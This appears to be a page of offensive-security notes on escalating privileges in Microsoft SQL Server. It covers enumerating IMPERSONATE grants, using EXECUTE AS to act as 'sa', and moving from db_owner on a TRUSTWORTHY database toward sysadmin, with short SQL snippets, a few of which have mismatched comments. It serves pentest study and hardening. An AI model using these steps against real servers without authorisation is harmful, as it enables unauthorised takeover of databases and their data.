# Privilege Escalation

## Overview

> Privilege escalation in Microsoft SQL Server is the process of gaining higher levels of access or control over the SQL Server instance or database than originally granted.

## Examples

### Enumeration IMPERSONATE permissions

> IMPERSONATE permissions in Microsoft SQL Server allow a user to impersonate another user or login and execute statements on their behalf. This can be useful for troubleshooting and testing permissions, but it also introduces potential security risks if not used properly.

#### Enabling IMPERSONATE permissions

To grant IMPERSONATE permission at the server level, use the following command:

```sql
GRANT IMPERSONATE ON LOGIN::[login_name] TO [user_name];
```

To grant IMPERSONATE permission at the database level, use the following command:

```sql
GRANT IMPERSONATE ON USER::[user_name] TO [user_name];
```

To grant IMPERSONATE permission at the schema level, use the following command:

```sql
GRANT IMPERSONATE ON SCHEMA::[schema_name] TO [user_name];
```

#### Finding IMPERSONATE permissions

To find out which users or logins have been granted IMPERSONATE permission in Microsoft SQL Server, you can use the following query:

{% code overflow="wrap" %}

```sql
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
```

{% endcode %}

### EXECUTE AS LOGIN

> The EXECUTE AS LOGIN statement in Microsoft SQL Server allows a user to execute a batch of SQL statements in the context of a specified login. This can be useful for testing permissions and troubleshooting issues related to permissions and access controls.
>
> When using EXECUTE AS LOGIN, the user must have the IMPERSONATE permission on the target login. This permission is typically granted to members of the sysadmin fixed server role, but can also be granted to other users and roles as needed.

{% code overflow="wrap" %}

```sql
EXECUTE AS LOGIN = 'sa';
-- SQL statements to be executed as 'mylogin'
REVERT;
```

{% endcode %}

### EXECUTE AS USER

> The EXECUTE AS USER statement in Microsoft SQL Server allows a user to execute a batch of SQL statements in the context of a specified user. This can be useful for testing permissions and troubleshooting issues related to permissions and access controls.
>
> When using EXECUTE AS USER, the user must have the IMPERSONATE permission on the target user. This permission is typically granted to members of the sysadmin fixed server role, but can also be granted to other users and roles as needed.

```sql
EXECUTE AS USER = 'sa';
-- SQL statements to be executed as 'myuser'
REVERT;
```

### From db\_owner to sysadmin

> In Microsoft SQL Server, the db\_owner role has a high level of privileges within a specific database, but it does not have permissions outside that database. However, if a database has been marked as trustworthy, a user with the db\_owner role can execute code within that database with the permissions of the database owner. This can allow an attacker to elevate their privileges and potentially gain access to the sysadmin role.

#### Identify a trustworthy database

Use the following query to identity trustworthy domains:

{% code overflow="wrap" %}

```sql
SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1;
```

{% endcode %}

Use the following query to verify your user role:

{% code overflow="wrap" %}

```sql
use <trustworthy_db>
SELECT r.name AS RoleName FROM sys.database_role_members rm INNER JOIN sys.database_principals p ON rm.member_principal_id = p.principal_id INNER JOIN sys.database_principals r ON rm.role_principal_id = r.principal_id WHERE p.name = USER_NAME() AND r.name = 'db_owner';
```

{% endcode %}

If your user is a db\_owner of a trustedworthy database, you can elevate your privileges:

{% code overflow="wrap" %}

```sql
"use msdb; EXECUTE AS USER = 'dbo';"
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rfc1918.gitbook.io/offsec/services/ms-sql-server/privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.